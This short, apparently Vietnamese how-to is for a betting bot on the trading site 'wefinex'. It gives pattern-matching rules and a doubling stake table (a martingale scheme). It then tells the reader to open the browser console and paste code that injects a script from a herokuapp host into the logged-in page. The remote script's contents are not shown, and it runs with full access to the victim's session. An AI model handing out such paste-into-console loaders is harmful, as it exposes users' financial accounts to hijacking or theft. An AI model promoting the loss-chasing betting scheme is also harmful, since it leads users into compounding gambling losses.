
FLow rule

var listRule = [
    "ddd->d",
    "dxddd->d",
    "xxddd->d",
    "dxdxddd->d",
    "xxdxddd->d",
    "dxxxddd->d",
    "xxxxddd->d",
    "dxdxdxddd->d",
    "xxdxdxddd->d",
    "xxxxdxddd->d",
    "dxxxdxddd->d",
    "dxdxxxddd->d",
    "xxdxxxddd->d",
    "dxxxxxddd->d",
    "xxxxxxddd->d",
];

var lostValueSet = {
    0: 1,
    1: 2,
    2: 4,
    3: 6
};


Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console

3s cuoi danh

//check lost more > 3


var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/version/v5-gapthep/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
